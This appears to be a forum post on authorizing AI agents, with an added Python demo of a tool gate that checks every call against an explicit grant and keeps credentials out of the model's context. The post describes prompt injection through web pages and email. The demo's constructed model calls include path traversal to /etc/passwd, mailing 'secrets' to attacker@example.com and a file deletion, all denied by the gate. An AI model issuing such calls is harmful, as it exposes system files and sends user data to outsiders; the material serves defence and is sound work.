Authorization feels like one of the trickiest parts of building AI agents that actually do real work.
Without it, they’re smart—but stuck on the sidelines. They can draft a reply, but you’re still the one logging in, clicking buttons, and shuffling files between apps.
With authorization, agents become much more useful — but also much riskier.
Once an agent can hop into your browser session, call APIs, or send emails, the question shifts. It's no longer "Is this model smart?" It's "What is it actually allowed to touch, and with which credentials?"
And here's the thing: you can't rely on prompts to keep things safe. Telling an agent "don't open this folder" or "don't send anything without checking first" isn't a guardrail, it's a wish. The model reads your instructions and the untrusted content it works on through the same channel, so anything on a web page or in an email can talk it out of them. If something shouldn't be accessible, the system itself needs to enforce that: the tool layer checks the request and holds the credentials, and the model never sees them.
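What "the system itself enforces it" looks like in practice, as an added example that is not part of the original post: every tool call the agent emits passes through a gate that checks it against an explicit grant (which tools, which directories, which mail recipients) and injects credentials itself, so a prompt-injected "read /etc/passwd" or "email this to attacker@example.com" is refused no matter what the model was told. The grant, tool names, workspace, sample model output and token value are all hypothetical and constructed for the demo.

```python
"""Added example (not from the original post): authorization enforced in the
tool-dispatch layer, not in the prompt. Tool names, grant, workspace contents
and the simulated model output below are hypothetical."""
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Constructed workspace: the only directory this agent run may read.
WORKSPACE = Path(tempfile.mkdtemp(prefix="agent-ws-"))
(WORKSPACE / "notes.txt").write_text("draft reply\n")


class Denied(Exception):
    """Raised by the gate; the model only ever sees the error string."""


@dataclass(frozen=True)
class Grant:
    """What one agent run may do. Anything not listed here is denied."""
    tools: frozenset            # tool names the agent may invoke
    readable_roots: tuple       # directories it may read under
    mail_recipients: frozenset  # exact addresses it may email


def confine(path: str, roots) -> Path:
    """Resolve '..' and symlinks before comparing, so traversal and
    symlink escapes are caught; relative paths are taken from the first root."""
    candidate = Path(path) if Path(path).is_absolute() else Path(roots[0]) / path
    real = candidate.resolve()
    for root in roots:
        root_real = Path(root).resolve()
        if real == root_real or root_real in real.parents:
            return real
    raise Denied(f"path outside granted roots: {path}")


def send_email(to: str, body: str, token: str) -> dict:
    """Stand-in for a mail API call (hypothetical); reports whether the gate's
    token, not anything the model supplied, was used."""
    return {"to": to, "bytes": len(body), "authenticated": token == "mail-token-123"}


class ToolGate:
    """Every tool call goes through here. Prompt text is never consulted."""

    def __init__(self, grant: Grant, credentials: dict):
        self.grant = grant
        self._credentials = credentials  # held by the gate, never in model context
        self.audit = []                  # (tool, "ok" | "denied") per call

    def call(self, tool: str, args: dict):
        try:
            result = self._dispatch(tool, dict(args))
            self.audit.append((tool, "ok"))
            return result
        except Denied as exc:
            self.audit.append((tool, "denied"))
            return {"error": str(exc)}

    def _dispatch(self, tool: str, args: dict):
        if tool not in self.grant.tools:
            raise Denied(f"tool not granted: {tool}")
        if tool == "read_file":
            path = confine(args["path"], self.grant.readable_roots)
            return {"content": path.read_text()}
        if tool == "send_email":
            if args.get("to") not in self.grant.mail_recipients:
                raise Denied(f"recipient not granted: {args.get('to')}")
            # The gate injects the token; any token the model put in args is ignored.
            return send_email(args["to"], args["body"], self._credentials["mail_token"])
        raise Denied(f"no handler for tool: {tool}")


def run_demo() -> list:
    """Run constructed model output (including calls an injected page might
    induce) through the gate and return the audit trail."""
    grant = Grant(tools=frozenset({"read_file", "send_email"}),
                  readable_roots=(str(WORKSPACE),),
                  mail_recipients=frozenset({"alice@example.com"}))
    gate = ToolGate(grant, credentials={"mail_token": "mail-token-123"})
    model_calls = [  # constructed, not real model output
        {"tool": "read_file", "args": {"path": "notes.txt"}},
        {"tool": "read_file", "args": {"path": "../../etc/passwd"}},
        {"tool": "read_file", "args": {"path": "/etc/passwd"}},
        {"tool": "send_email", "args": {"to": "alice@example.com", "body": "draft reply"}},
        {"tool": "send_email", "args": {"to": "attacker@example.com", "body": "secrets",
                                        "api_token": "stolen"}},
        {"tool": "delete_file", "args": {"path": "notes.txt"}},
    ]
    for call in model_calls:
        gate.call(call["tool"], call["args"])
    return gate.audit


if __name__ == "__main__":
    for entry in run_demo():
        print(entry)
```

The point of the structure is that the three things an attacker can influence (which tool, which arguments, what the prompt says) are all checked against data the attacker cannot influence (the grant and the credential store), and the credential never enters the model's context at all. Denials are logged, so an unexpected run of "denied" entries is also your detection signal that something in the agent's input is trying to steer it.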
Curious where people draw the line:
how far would you actually let an agent go on your behalf?
Feels like too little authorization makes agents glorified chatbots, but too much makes them hard to trust.